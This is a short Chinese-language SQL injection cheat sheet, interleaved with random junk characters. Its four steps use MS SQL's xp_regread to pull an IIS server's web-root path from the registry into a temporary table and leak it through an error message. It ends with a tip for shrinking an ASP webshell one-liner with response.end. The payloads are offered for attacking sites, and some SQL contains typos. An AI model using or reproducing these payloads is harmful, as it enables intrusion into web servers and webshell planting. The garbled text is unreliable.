1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表
: `9 P4 {+ h3 O8 B4 @+ L
3 B- ^$ `# g: h, B2 X) M0 b) _& T0 l7 h f! n- P% e
2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中
1 {" f& b, G6 p/ @- ?& W2 A# s C
" ]) m' u- ^: ? w* X4 @9 K/ } C Q, H0 d
3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段. @8 Z( ]2 x7 P# ~2 |
7 v& _5 V9 M$ ]& u+ q& p. ~" t7 b
+ i. |5 j* q* C8 ^% [$ V" _
4、drop table [jm_tmp]-- 删除此表。
( p1 E4 R+ G5 z4 v+ c
- c$ W' E' n# O! C `- q. f3 ]' i1 c A- v/ _7 g, P
另附上备分专用一句话! C l" p" T$ K& f
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.4 M0 [, z, J0 Z U4 s* f
|